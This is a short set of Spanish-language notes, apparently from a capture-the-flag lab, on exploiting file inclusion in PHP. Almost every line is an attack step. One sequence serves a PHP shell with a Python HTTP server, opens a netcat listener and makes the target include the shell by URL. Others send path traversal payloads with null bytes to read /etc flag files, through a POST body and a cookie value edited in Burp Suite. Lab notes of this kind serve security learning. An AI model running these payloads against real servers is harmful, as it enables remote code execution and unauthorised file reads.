“allow_url_fopen” debe estar activo.
# Preparar 'Shell.php'
python -m http.server 80
nc -lvnp 1234
php?file=http://<IPa>/shell.php # Llamamos por URL
curl -X POST <http://IP/ -d 'file=/etc/flag1'
Petición POST - Burpsuite
# Capturar request > Enviar a REPEATER > 'Change request method'
# POST
file=../../../../etc/flag3%00
# Capturar Request > Inyectar en el campo de Cookie Value.
'../../../../etc/flag2%00'
